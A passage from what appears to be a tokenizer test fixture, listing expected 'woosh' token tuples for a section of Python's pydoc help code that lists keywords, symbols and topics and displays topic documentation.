woosh.Token(woosh.OP, ')', 2083, 29, 2083, 30),
woosh.Token(woosh.OP, ':', 2083, 30, 2083, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 2083, 31, 2084, 0),
woosh.Token(woosh.INDENT, ' ', 2084, 0, 2084, 12),
woosh.Token(woosh.NAME, 'for', 2084, 12, 2084, 15),
woosh.Token(woosh.NAME, 'col', 2084, 16, 2084, 19),
woosh.Token(woosh.NAME, 'in', 2084, 20, 2084, 22),
woosh.Token(woosh.NAME, 'range', 2084, 23, 2084, 28),
woosh.Token(woosh.OP, '(', 2084, 28, 2084, 29),
woosh.Token(woosh.NAME, 'columns', 2084, 29, 2084, 36),
woosh.Token(woosh.OP, ')', 2084, 36, 2084, 37),
woosh.Token(woosh.OP, ':', 2084, 37, 2084, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2084, 38, 2085, 0),
woosh.Token(woosh.INDENT, ' ', 2085, 0, 2085, 16),
woosh.Token(woosh.NAME, 'i', 2085, 16, 2085, 17),
woosh.Token(woosh.OP, '=', 2085, 18, 2085, 19),
woosh.Token(woosh.NAME, 'col', 2085, 20, 2085, 23),
woosh.Token(woosh.OP, '*', 2085, 24, 2085, 25),
woosh.Token(woosh.NAME, 'rows', 2085, 26, 2085, 30),
woosh.Token(woosh.OP, '+', 2085, 31, 2085, 32),
woosh.Token(woosh.NAME, 'row', 2085, 33, 2085, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2085, 36, 2086, 0),
woosh.Token(woosh.NAME, 'if', 2086, 16, 2086, 18),
woosh.Token(woosh.NAME, 'i', 2086, 19, 2086, 20),
woosh.Token(woosh.OP, '<', 2086, 21, 2086, 22),
woosh.Token(woosh.NAME, 'len', 2086, 23, 2086, 26),
woosh.Token(woosh.OP, '(', 2086, 26, 2086, 27),
woosh.Token(woosh.NAME, 'items', 2086, 27, 2086, 32),
woosh.Token(woosh.OP, ')', 2086, 32, 2086, 33),
woosh.Token(woosh.OP, ':', 2086, 33, 2086, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2086, 34, 2087, 0),
woosh.Token(woosh.INDENT, ' ', 2087, 0, 2087, 20),
woosh.Token(woosh.NAME, 'self', 2087, 20, 2087, 24),
woosh.Token(woosh.OP, '.', 2087, 24, 2087, 25),
woosh.Token(woosh.NAME, 'output', 2087, 25, 2087, 31),
woosh.Token(woosh.OP, '.', 2087, 31, 2087, 32),
woosh.Token(woosh.NAME, 'write', 2087, 32, 2087, 37),
woosh.Token(woosh.OP, '(', 2087, 37, 2087, 38),
woosh.Token(woosh.NAME, 'items', 2087, 38, 2087, 43),
woosh.Token(woosh.OP, '[', 2087, 43, 2087, 44),
woosh.Token(woosh.NAME, 'i', 2087, 44, 2087, 45),
woosh.Token(woosh.OP, ']', 2087, 45, 2087, 46),
woosh.Token(woosh.OP, ')', 2087, 46, 2087, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 2087, 47, 2088, 0),
woosh.Token(woosh.NAME, 'if', 2088, 20, 2088, 22),
woosh.Token(woosh.NAME, 'col', 2088, 23, 2088, 26),
woosh.Token(woosh.OP, '<', 2088, 27, 2088, 28),
woosh.Token(woosh.NAME, 'columns', 2088, 29, 2088, 36),
woosh.Token(woosh.OP, '-', 2088, 37, 2088, 38),
woosh.Token(woosh.NUMBER, '1', 2088, 39, 2088, 40),
woosh.Token(woosh.OP, ':', 2088, 40, 2088, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2088, 41, 2089, 0),
woosh.Token(woosh.INDENT, ' ', 2089, 0, 2089, 24),
woosh.Token(woosh.NAME, 'self', 2089, 24, 2089, 28),
woosh.Token(woosh.OP, '.', 2089, 28, 2089, 29),
woosh.Token(woosh.NAME, 'output', 2089, 29, 2089, 35),
woosh.Token(woosh.OP, '.', 2089, 35, 2089, 36),
woosh.Token(woosh.NAME, 'write', 2089, 36, 2089, 41),
woosh.Token(woosh.OP, '(', 2089, 41, 2089, 42),
woosh.Token(woosh.STRING, "' '", 2089, 42, 2089, 45),
woosh.Token(woosh.OP, '+', 2089, 46, 2089, 47),
woosh.Token(woosh.STRING, "' '", 2089, 48, 2089, 51),
woosh.Token(woosh.OP, '*', 2089, 52, 2089, 53),
woosh.Token(woosh.OP, '(', 2089, 54, 2089, 55),
woosh.Token(woosh.NAME, 'colw', 2089, 55, 2089, 59),
woosh.Token(woosh.OP, '-', 2089, 60, 2089, 61),
woosh.Token(woosh.NUMBER, '1', 2089, 62, 2089, 63),
woosh.Token(woosh.OP, '-', 2089, 64, 2089, 65),
woosh.Token(woosh.NAME, 'len', 2089, 66, 2089, 69),
woosh.Token(woosh.OP, '(', 2089, 69, 2089, 70),
woosh.Token(woosh.NAME, 'items', 2089, 70, 2089, 75),
woosh.Token(woosh.OP, '[', 2089, 75, 2089, 76),
woosh.Token(woosh.NAME, 'i', 2089, 76, 2089, 77),
woosh.Token(woosh.OP, ']', 2089, 77, 2089, 78),
woosh.Token(woosh.OP, ')', 2089, 78, 2089, 79),
woosh.Token(woosh.OP, ')', 2089, 79, 2089, 80),
woosh.Token(woosh.OP, ')', 2089, 80, 2089, 81),
woosh.Token(woosh.NEWLINE, '\r\n', 2089, 81, 2090, 0),
woosh.Token(woosh.DEDENT, ' ', 2090, 0, 2090, 12),
woosh.Token(woosh.DEDENT, '', 2090, 12, 2090, 12),
woosh.Token(woosh.DEDENT, '', 2090, 12, 2090, 12),
woosh.Token(woosh.NAME, 'self', 2090, 12, 2090, 16),
woosh.Token(woosh.OP, '.', 2090, 16, 2090, 17),
woosh.Token(woosh.NAME, 'output', 2090, 17, 2090, 23),
woosh.Token(woosh.OP, '.', 2090, 23, 2090, 24),
woosh.Token(woosh.NAME, 'write', 2090, 24, 2090, 29),
woosh.Token(woosh.OP, '(', 2090, 29, 2090, 30),
woosh.Token(woosh.STRING, "'\\n'", 2090, 30, 2090, 34),
woosh.Token(woosh.OP, ')', 2090, 34, 2090, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2090, 35, 2091, 0),
woosh.Token(woosh.DEDENT, ' ', 2092, 0, 2092, 4),
woosh.Token(woosh.DEDENT, '', 2092, 4, 2092, 4),
woosh.Token(woosh.NAME, 'def', 2092, 4, 2092, 7),
woosh.Token(woosh.NAME, 'listkeywords', 2092, 8, 2092, 20),
woosh.Token(woosh.OP, '(', 2092, 20, 2092, 21),
woosh.Token(woosh.NAME, 'self', 2092, 21, 2092, 25),
woosh.Token(woosh.OP, ')', 2092, 25, 2092, 26),
woosh.Token(woosh.OP, ':', 2092, 26, 2092, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2092, 27, 2093, 0),
woosh.Token(woosh.INDENT, ' ', 2093, 0, 2093, 8),
woosh.Token(woosh.NAME, 'self', 2093, 8, 2093, 12),
woosh.Token(woosh.OP, '.', 2093, 12, 2093, 13),
woosh.Token(woosh.NAME, 'output', 2093, 13, 2093, 19),
woosh.Token(woosh.OP, '.', 2093, 19, 2093, 20),
woosh.Token(woosh.NAME, 'write', 2093, 20, 2093, 25),
woosh.Token(woosh.OP, '(', 2093, 25, 2093, 26),
woosh.Token(woosh.STRING, "'''\r\nHere is a list of the Python keywords. Enter any keyword to get more help.\r\n\r\n'''", 2093, 26, 2096, 3),
woosh.Token(woosh.OP, ')', 2096, 3, 2096, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2096, 4, 2097, 0),
woosh.Token(woosh.NAME, 'self', 2097, 8, 2097, 12),
woosh.Token(woosh.OP, '.', 2097, 12, 2097, 13),
woosh.Token(woosh.NAME, 'list', 2097, 13, 2097, 17),
woosh.Token(woosh.OP, '(', 2097, 17, 2097, 18),
woosh.Token(woosh.NAME, 'self', 2097, 18, 2097, 22),
woosh.Token(woosh.OP, '.', 2097, 22, 2097, 23),
woosh.Token(woosh.NAME, 'keywords', 2097, 23, 2097, 31),
woosh.Token(woosh.OP, '.', 2097, 31, 2097, 32),
woosh.Token(woosh.NAME, 'keys', 2097, 32, 2097, 36),
woosh.Token(woosh.OP, '(', 2097, 36, 2097, 37),
woosh.Token(woosh.OP, ')', 2097, 37, 2097, 38),
woosh.Token(woosh.OP, ')', 2097, 38, 2097, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 2097, 39, 2098, 0),
woosh.Token(woosh.DEDENT, ' ', 2099, 0, 2099, 4),
woosh.Token(woosh.NAME, 'def', 2099, 4, 2099, 7),
woosh.Token(woosh.NAME, 'listsymbols', 2099, 8, 2099, 19),
woosh.Token(woosh.OP, '(', 2099, 19, 2099, 20),
woosh.Token(woosh.NAME, 'self', 2099, 20, 2099, 24),
woosh.Token(woosh.OP, ')', 2099, 24, 2099, 25),
woosh.Token(woosh.OP, ':', 2099, 25, 2099, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2099, 26, 2100, 0),
woosh.Token(woosh.INDENT, ' ', 2100, 0, 2100, 8),
woosh.Token(woosh.NAME, 'self', 2100, 8, 2100, 12),
woosh.Token(woosh.OP, '.', 2100, 12, 2100, 13),
woosh.Token(woosh.NAME, 'output', 2100, 13, 2100, 19),
woosh.Token(woosh.OP, '.', 2100, 19, 2100, 20),
woosh.Token(woosh.NAME, 'write', 2100, 20, 2100, 25),
woosh.Token(woosh.OP, '(', 2100, 25, 2100, 26),
woosh.Token(woosh.STRING, "'''\r\nHere is a list of the punctuation symbols which Python assigns special meaning\r\nto. Enter any symbol to get more help.\r\n\r\n'''", 2100, 26, 2104, 3),
woosh.Token(woosh.OP, ')', 2104, 3, 2104, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2104, 4, 2105, 0),
woosh.Token(woosh.NAME, 'self', 2105, 8, 2105, 12),
woosh.Token(woosh.OP, '.', 2105, 12, 2105, 13),
woosh.Token(woosh.NAME, 'list', 2105, 13, 2105, 17),
woosh.Token(woosh.OP, '(', 2105, 17, 2105, 18),
woosh.Token(woosh.NAME, 'self', 2105, 18, 2105, 22),
woosh.Token(woosh.OP, '.', 2105, 22, 2105, 23),
woosh.Token(woosh.NAME, 'symbols', 2105, 23, 2105, 30),
woosh.Token(woosh.OP, '.', 2105, 30, 2105, 31),
woosh.Token(woosh.NAME, 'keys', 2105, 31, 2105, 35),
woosh.Token(woosh.OP, '(', 2105, 35, 2105, 36),
woosh.Token(woosh.OP, ')', 2105, 36, 2105, 37),
woosh.Token(woosh.OP, ')', 2105, 37, 2105, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2105, 38, 2106, 0),
woosh.Token(woosh.DEDENT, ' ', 2107, 0, 2107, 4),
woosh.Token(woosh.NAME, 'def', 2107, 4, 2107, 7),
woosh.Token(woosh.NAME, 'listtopics', 2107, 8, 2107, 18),
woosh.Token(woosh.OP, '(', 2107, 18, 2107, 19),
woosh.Token(woosh.NAME, 'self', 2107, 19, 2107, 23),
woosh.Token(woosh.OP, ')', 2107, 23, 2107, 24),
woosh.Token(woosh.OP, ':', 2107, 24, 2107, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2107, 25, 2108, 0),
woosh.Token(woosh.INDENT, ' ', 2108, 0, 2108, 8),
woosh.Token(woosh.NAME, 'self', 2108, 8, 2108, 12),
woosh.Token(woosh.OP, '.', 2108, 12, 2108, 13),
woosh.Token(woosh.NAME, 'output', 2108, 13, 2108, 19),
woosh.Token(woosh.OP, '.', 2108, 19, 2108, 20),
woosh.Token(woosh.NAME, 'write', 2108, 20, 2108, 25),
woosh.Token(woosh.OP, '(', 2108, 25, 2108, 26),
woosh.Token(woosh.STRING, "'''\r\nHere is a list of available topics. Enter any topic name to get more help.\r\n\r\n'''", 2108, 26, 2111, 3),
woosh.Token(woosh.OP, ')', 2111, 3, 2111, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2111, 4, 2112, 0),
woosh.Token(woosh.NAME, 'self', 2112, 8, 2112, 12),
woosh.Token(woosh.OP, '.', 2112, 12, 2112, 13),
woosh.Token(woosh.NAME, 'list', 2112, 13, 2112, 17),
woosh.Token(woosh.OP, '(', 2112, 17, 2112, 18),
woosh.Token(woosh.NAME, 'self', 2112, 18, 2112, 22),
woosh.Token(woosh.OP, '.', 2112, 22, 2112, 23),
woosh.Token(woosh.NAME, 'topics', 2112, 23, 2112, 29),
woosh.Token(woosh.OP, '.', 2112, 29, 2112, 30),
woosh.Token(woosh.NAME, 'keys', 2112, 30, 2112, 34),
woosh.Token(woosh.OP, '(', 2112, 34, 2112, 35),
woosh.Token(woosh.OP, ')', 2112, 35, 2112, 36),
woosh.Token(woosh.OP, ')', 2112, 36, 2112, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2112, 37, 2113, 0),
woosh.Token(woosh.DEDENT, ' ', 2114, 0, 2114, 4),
woosh.Token(woosh.NAME, 'def', 2114, 4, 2114, 7),
woosh.Token(woosh.NAME, 'showtopic', 2114, 8, 2114, 17),
woosh.Token(woosh.OP, '(', 2114, 17, 2114, 18),
woosh.Token(woosh.NAME, 'self', 2114, 18, 2114, 22),
woosh.Token(woosh.OP, ',', 2114, 22, 2114, 23),
woosh.Token(woosh.NAME, 'topic', 2114, 24, 2114, 29),
woosh.Token(woosh.OP, ',', 2114, 29, 2114, 30),
woosh.Token(woosh.NAME, 'more_xrefs', 2114, 31, 2114, 41),
woosh.Token(woosh.OP, '=', 2114, 41, 2114, 42),
woosh.Token(woosh.STRING, "''", 2114, 42, 2114, 44),
woosh.Token(woosh.OP, ')', 2114, 44, 2114, 45),
woosh.Token(woosh.OP, ':', 2114, 45, 2114, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2114, 46, 2115, 0),
woosh.Token(woosh.INDENT, ' ', 2115, 0, 2115, 8),
woosh.Token(woosh.NAME, 'try', 2115, 8, 2115, 11),
woosh.Token(woosh.OP, ':', 2115, 11, 2115, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 2115, 12, 2116, 0),
woosh.Token(woosh.INDENT, ' ', 2116, 0, 2116, 12),
woosh.Token(woosh.NAME, 'import', 2116, 12, 2116, 18),
woosh.Token(woosh.NAME, 'pydoc_data', 2116, 19, 2116, 29),
woosh.Token(woosh.OP, '.', 2116, 29, 2116, 30),
woosh.Token(woosh.NAME, 'topics', 2116, 30, 2116, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2116, 36, 2117, 0),
woosh.Token(woosh.DEDENT, ' ', 2117, 0, 2117, 8),
woosh.Token(woosh.NAME, 'except', 2117, 8, 2117, 14),
woosh.Token(woosh.NAME, 'ImportError', 2117, 15, 2117, 26),
woosh.Token(woosh.OP, ':', 2117, 26, 2117, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2117, 27, 2118, 0),
woosh.Token(woosh.INDENT, ' ', 2118, 0, 2118, 12),
woosh.Token(woosh.NAME, 'self', 2118, 12, 2118, 16),
woosh.Token(woosh.OP, '.', 2118, 16, 2118, 17),
woosh.Token(woosh.NAME, 'output', 2118, 17, 2118, 23),
woosh.Token(woosh.OP, '.', 2118, 23, 2118, 24),
woosh.Token(woosh.NAME, 'write', 2118, 24, 2118, 29),
woosh.Token(woosh.OP, '(', 2118, 29, 2118, 30),
woosh.Token(woosh.STRING, '\'\'\'\r\nSorry, topic and keyword documentation is not available because the\r\nmodule "pydoc_data.topics" could not be found.\r\n\'\'\'', 2118, 30, 2121, 3),
woosh.Token(woosh.OP, ')', 2121, 3, 2121, 4),
woosh.Token(woosh.NEWLINE, '\r\n', 2121, 4, 2122, 0),
woosh.Token(woosh.NAME, 'return', 2122, 12, 2122, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 2122, 18, 2123, 0),
woosh.Token(woosh.DEDENT, ' ', 2123, 0, 2123, 8),
woosh.Token(woosh.NAME, 'target', 2123, 8, 2123, 14),
woosh.Token(woosh.OP, '=', 2123, 15, 2123, 16),
woosh.Token(woosh.NAME, 'self', 2123, 17, 2123, 21),
woosh.Token(woosh.OP, '.', 2123, 21, 2123, 22),
woosh.Token(woosh.NAME, 'topics', 2123, 22, 2123, 28),
woosh.Token(woosh.OP, '.', 2123, 28, 2123, 29),
woosh.Token(woosh.NAME, 'get', 2123, 29, 2123, 32),
woosh.Token(woosh.OP, '(', 2123, 32, 2123, 33),
woosh.Token(woosh.NAME, 'topic', 2123, 33, 2123, 38),
woosh.Token(woosh.OP, ',', 2123, 38, 2123, 39),
woosh.Token(woosh.NAME, 'self', 2123, 40, 2123, 44),
woosh.Token(woosh.OP, '.', 2123, 44, 2123, 45),
woosh.Token(woosh.NAME, 'keywords', 2123, 45, 2123, 53),
woosh.Token(woosh.OP, '.', 2123, 53, 2123, 54),
woosh.Token(woosh.NAME, 'get', 2123, 54, 2123, 57),
woosh.Token(woosh.OP, '(', 2123, 57, 2123, 58),
woosh.Token(woosh.NAME, 'topic', 2123, 58, 2123, 63),
woosh.Token(woosh.OP, ')', 2123, 63, 2123, 64),
woosh.Token(woosh.OP, ')', 2123, 64, 2123, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 2123, 65, 2124, 0),
woosh.Token(woosh.NAME, 'if', 2124, 8, 2124, 10),
woosh.Token(woosh.NAME, 'not', 2124, 11, 2124, 14),
woosh.Token(woosh.NAME, 'target', 2124, 15, 2124, 21),
woosh.Token(woosh.OP, ':', 2124, 21, 2124, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2124, 22, 2125, 0),
woosh.Token(woosh.INDENT, ' ', 2125, 0, 2125, 12),
woosh.Token(woosh.NAME, 'self', 2125, 12, 2125, 16),
woosh.Token(woosh.OP, '.', 2125, 16, 2125, 17),
woosh.Token(woosh.NAME, 'output', 2125, 17, 2125, 23),
woosh.Token(woosh.OP, '.', 2125, 23, 2125, 24),
woosh.Token(woosh.NAME, 'write', 2125, 24, 2125, 29),
woosh.Token(woosh.OP, '(', 2125, 29, 2125, 30),
woosh.Token(woosh.STRING, "'no documentation found for %s\\n'", 2125, 30, 2125, 63),
woosh.Token(woosh.OP, '%', 2125, 64, 2125, 65),
woosh.Token(woosh.NAME, 'repr', 2125, 66, 2125, 70),
woosh.Token(woosh.OP, '(', 2125, 70, 2125, 71),
woosh.Token(woosh.NAME, 'topic', 2125, 71, 2125, 76),
woosh.Token(woosh.OP, ')', 2125, 76, 2125, 77),
woosh.Token(woosh.OP, ')', 2125, 77, 2125, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 2125, 78, 2126, 0),
woosh.Token(woosh.NAME, 'return', 2126, 12, 2126, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 2126, 18, 2127, 0),
woosh.Token(woosh.DEDENT, ' ', 2127, 0, 2127, 8),
woosh.Token(woosh.NAME, 'if', 2127, 8, 2127, 10),
woosh.Token(woosh.NAME, 'type', 2127, 11, 2127, 15),
woosh.Token(woosh.OP, '(', 2127, 15, 2127, 16),
woosh.Token(woosh.NAME, 'target', 2127, 16, 2127, 22),
woosh.Token(woosh.OP, ')', 2127, 22, 2127, 23),
woosh.Token(woosh.NAME, 'is', 2127, 24, 2127, 26),
woosh.Token(woosh.NAME, 'type', 2127, 27, 2127, 31),
woosh.Token(woosh.OP, '(', 2127, 31, 2127, 32),
woosh.Token(woosh.STRING, "''", 2127, 32, 2127, 34),
woosh.Token(woosh.OP, ')', 2127, 34, 2127, 35),
woosh.Token(woosh.OP, ':', 2127, 35, 2127, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2127, 36, 2128, 0),
woosh.Token(woosh.INDENT, ' ', 2128, 0, 2128, 12),
woosh.Token(woosh.NAME, 'return', 2128, 12, 2128, 18),
woosh.Token(woosh.NAME, 'self', 2128, 19, 2128, 23),
woosh.Token(woosh.OP, '.', 2128, 23, 2128, 24),
woosh.Token(woosh.NAME, 'showtopic', 2128, 24, 2128, 33),
woosh.Token(woosh.OP, '(', 2128, 33, 2128, 34),
woosh.Token(woosh.NAME, 'target', 2128, 34, 2128, 40),
woosh.Token(woosh.OP, ',', 2128, 40, 2128, 41),
woosh.Token(woosh.NAME, 'more_xrefs', 2128, 42, 2128, 52),
woosh.Token(woosh.OP, ')', 2128, 52, 2128, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2128, 53, 2129, 0),
woosh.Token(woosh.DEDENT, ' ', 2130, 0, 2130, 8),
woosh.Token(woosh.NAME, 'label', 2130, 8, 2130, 13),
woosh.Token(woosh.OP, ',', 2130, 13, 2130, 14),
woosh.Token(woosh.NAME, 'xrefs', 2130, 15, 2130, 20),
woosh.Token(woosh.OP, '=', 2130, 21, 2130, 22),
woosh.Token(woosh.NAME, 'target', 2130, 23, 2130, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2130, 29, 2131, 0),
woosh.Token(woosh.NAME, 'try', 2131, 8, 2131, 11),
woosh.Token(woosh.OP, ':', 2131, 11, 2131, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 2131, 12, 2132, 0),
woosh.Token(woosh.INDENT, ' ', 2132, 0, 2132, 12),
woosh.Token(woosh.NAME, 'doc', 2132, 12, 2132, 15),
woosh.Token(woosh.OP, '=', 2132, 16, 2132, 17),
woosh.Token(woosh.NAME, 'pydoc_data', 2132, 18, 2132, 28),
woosh.Token(woosh.OP, '.', 2132, 28, 2132, 29),
woosh.Token(woosh.NAME, 'topics', 2132, 29, 2132, 35),
woosh.Token(woosh.OP, '.', 2132, 35, 2132, 36),
woosh.Token(woosh.NAME, 'topics', 2132, 36, 2132, 42),
woosh.Token(woosh.OP, '[', 2132, 42, 2132, 43),
woosh.Token(woosh.NAME, 'label', 2132, 43, 2132, 48),
woosh.Token(woosh.OP, ']', 2132, 48, 2132, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 2132, 49, 2133, 0),
woosh.Token(woosh.DEDENT, ' ', 2133, 0, 2133, 8),
woosh.Token(woosh.NAME, 'except', 2133, 8, 2133, 14),
woosh.Token(woosh.NAME, 'KeyError', 2133, 15, 2133, 23),
woosh.Token(woosh.OP, ':', 2133, 23, 2133, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2133, 24, 2134, 0),
woosh.Token(woosh.INDENT, ' ', 2134, 0, 2134, 12),
woosh.Token(woosh.NAME, 'self', 2134, 12, 2134, 16),
woosh.Token(woosh.OP, '.', 2134, 16, 2134, 17),
woosh.Token(woosh.NAME, 'output', 2134, 17, 2134, 23),
woosh.Token(woosh.OP, '.', 2134, 23, 2134, 24),
woosh.Token(woosh.NAME, 'write', 2134, 24, 2134, 29),
woosh.Token(woosh.OP, '(', 2134, 29, 2134, 30),
woosh.Token(woosh.STRING, "'no documentation found for %s\\n'", 2134, 30, 2134, 63),
woosh.Token(woosh.OP, '%', 2134, 64, 2134, 65),
woosh.Token(woosh.NAME, 'repr', 2134, 66, 2134, 70),
woosh.Token(woosh.OP, '(', 2134, 70, 2134, 71),
woosh.Token(woosh.NAME, 'topic', 2134, 71, 2134, 76),
woosh.Token(woosh.OP, ')', 2134, 76, 2134, 77),
woosh.Token(woosh.OP, ')', 2134, 77, 2134, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 2134, 78, 2135, 0),
woosh.Token(woosh.NAME, 'return', 2135, 12, 2135, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 2135, 18, 2136, 0),
woosh.Token(woosh.DEDENT, ' ', 2136, 0, 2136, 8),
woosh.Token(woosh.NAME, 'doc', 2136, 8, 2136, 11),
woosh.Token(woosh.OP, '=', 2136, 12, 2136, 13),
woosh.Token(woosh.NAME, 'doc', 2136, 14, 2136, 17),
woosh.Token(woosh.OP, '.', 2136, 17, 2136, 18),
woosh.Token(woosh.NAME, 'strip', 2136, 18, 2136, 23),
woosh.Token(woosh.OP, '(', 2136, 23, 2136, 24),
woosh.Token(woosh.OP, ')', 2136, 24, 2136, 25),
woosh.Token(woosh.OP, '+', 2136, 26, 2136, 27),
woosh.Token(woosh.STRING, "'\\n'", 2136, 28, 2136, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2136, 32, 2137, 0),
woosh.Token(woosh.NAME, 'if', 2137, 8, 2137, 10),
woosh.Token(woosh.NAME, 'more_xrefs', 2137, 11, 2137, 21),
woosh.Token(woosh.OP, ':', 2137, 21, 2137, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2137, 22, 2138, 0),
woosh.Token(woosh.INDENT, ' ', 2138, 0, 2138, 12),
woosh.Token(woosh.NAME, 'xrefs', 2138, 12, 2138, 17),
woosh.Token(woosh.OP, '=', 2138, 18, 2138, 19),
woosh.Token(woosh.OP, '(', 2138, 20, 2138, 21),
woosh.Token(woosh.NAME, 'xrefs', 2138, 21, 2138, 26),
woosh.Token(woosh.NAME, 'or', 2138, 27, 2138, 29),
woosh.Token(woosh.STRING, "''", 2138, 30, 2138, 32),
woosh.Token(woosh.OP, ')', 2138, 32, 2138, 33),
woosh.Token(woosh.OP, '+', 2138, 34, 2138, 35),
woosh.Token(woosh.STRING, "' '", 2138, 36, 2138, 39),
woosh.Token(woosh.OP, '+', 2138, 40, 2138, 41),
woosh.Token(woosh.NAME, 'more_xrefs', 2138, 42, 2138, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 2138, 52, 2139, 0),
woosh.Token(woosh.DEDENT, ' ', 2139, 0, 2139, 8),
woosh.Token(woosh.NAME, 'if', 2139, 8, 2139, 10),
woosh.Token(woosh.NAME, 'xrefs', 2139, 11, 2139, 16),
woosh.Token(woosh.OP, ':', 2139, 16, 2139, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 2139, 17, 2140, 0),
woosh.Token(woosh.INDENT, ' ', 2140, 0, 2140, 12),
woosh.Token(woosh.NAME, 'import', 2140, 12, 2140, 18),
woosh.Token(woosh.NAME, 'textwrap', 2140, 19, 2140, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2140, 27, 2141, 0),
woosh.Token(woosh.NAME, 'text', 2141, 12, 2141, 16),
woosh.Token(woosh.OP, '=', 2141, 17, 2141, 18),
woosh.Token(woosh.STRING, "'Related help topics: '", 2141, 19, 2141, 42),
woosh.Token(woosh.OP, '+', 2141, 43, 2141, 44),
woosh.Token(woosh.STRING, "', '", 2141, 45, 2141, 49),
woosh.Token(woosh.OP, '.', 2141, 49, 2141, 50),
woosh.Token(woosh.NAME, 'join', 2141, 50, 2141, 54),
woosh.Token(woosh.OP, '(', 2141, 54, 2141, 55),
woosh.Token(woosh.NAME, 'xrefs', 2141, 55, 2141, 60),
woosh.Token(woosh.OP, '.', 2141, 60, 2141, 61),
woosh.Token(woosh.NAME, 'split', 2141, 61, 2141, 66),
woosh.Token(woosh.OP, '(', 2141, 66, 2141, 67),
woosh.Token(woosh.OP, ')', 2141, 67, 2141, 68),
woosh.Token(woosh.OP, ')', 2141, 68, 2141, 69),
woosh.Token(woosh.OP, '+', 2141, 70, 2141, 71),
woosh.Token(woosh.STRING, "'\\n'", 2141, 72, 2141, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 2141, 76, 2142, 0),
woosh.Token(woosh.NAME, 'wrapped_text', 2142, 12, 2142, 24),
woosh.Token(woosh.OP, '=', 2142, 25, 2142, 26),
woosh.Token(woosh.NAME, 'textwrap', 2142, 27, 2142, 35),
woosh.Token(woosh.OP, '.', 2142, 35, 2142, 36),
woosh.Token(woosh.NAME, 'wrap', 2142, 36, 2142, 40),
woosh.Token(woosh.OP, '(', 2142, 40, 2142, 41),
woosh.Token(woosh.NAME, 'text', 2142, 41, 2142, 45),
woosh.Token(woosh.OP, ',', 2142, 45, 2142, 46),
woosh.Token(woosh.NUMBER, '72', 2142, 47, 2142, 49),
woosh.Token(woosh.OP, ')', 2142, 49, 2142, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 2142, 50, 2143, 0),
woosh.Token(woosh.NAME, 'doc', 2143, 12, 2143, 15),
woosh.Token(woosh.OP, '+=', 2143, 16, 2143, 18),
woosh.Token(woosh.STRING, "'\\n%s\\n'", 2143, 19, 2143, 27),
woosh.Token(woosh.OP, '%', 2143, 28, 2143, 29),
woosh.Token(woosh.STRING, "'\\n'", 2143, 30, 2143, 34),
woosh.Token(woosh.OP, '.', 2143, 34, 2143, 35),
woosh.Token(woosh.NAME, 'join', 2143, 35, 2143, 39),
woosh.Token(woosh.OP, '(', 2143, 39, 2143, 40),
woosh.Token(woosh.NAME, 'wrapped_text', 2143, 40, 2143, 52),
woosh.Token(woosh.OP, ')', 2143, 52, 2143, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2143, 53, 2144, 0),
woosh.Token(woosh.DEDENT, ' ', 2144, 0, 2144, 8),
woosh.Token(woosh.NAME, 'pager', 2144, 8, 2144, 13),
woosh.Token(woosh.OP, '(', 2144, 13, 2144, 14),
woosh.Token(woosh.NAME, 'doc', 2144, 14, 2144, 17),
woosh.Token(woosh.OP, ')', 2144, 17, 2144, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 2144, 18, 2145, 0),
woosh.Token(woosh.DEDENT, ' ', 2146, 0, 2146, 4),
woosh.Token(woosh.NAME, 'def', 2146, 4, 2146, 7),
woosh.Token(woosh.NAME, '_gettopic', 2146, 8, 2146, 17),
woosh.Token(woosh.OP, '(', 2146, 17, 2146, 18),
woosh.Token(woosh.NAME, 'self', 2146, 18, 2146, 22),
woosh.Token(woosh.OP, ',', 2146, 22, 2146, 23),
woosh.Token(woosh.NAME, 'topic', 2146, 24, 2146, 29),
woosh.Token(woosh.OP, ',', 2146, 29, 2146, 30),
woosh.Token(woosh.NAME, 'more_xrefs', 2146, 31, 2146, 41),
woosh.Token(woosh.OP, '=', 2146, 41, 2146, 42),
woosh.Token(woosh.STRING, "''", 2146, 42, 2146, 44),
woosh.Token(woosh.OP, ')', 2146, 44, 2146, 45),
woosh.Token(woosh.OP, ':', 2146, 45, 2146, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2146, 46, 2147, 0),
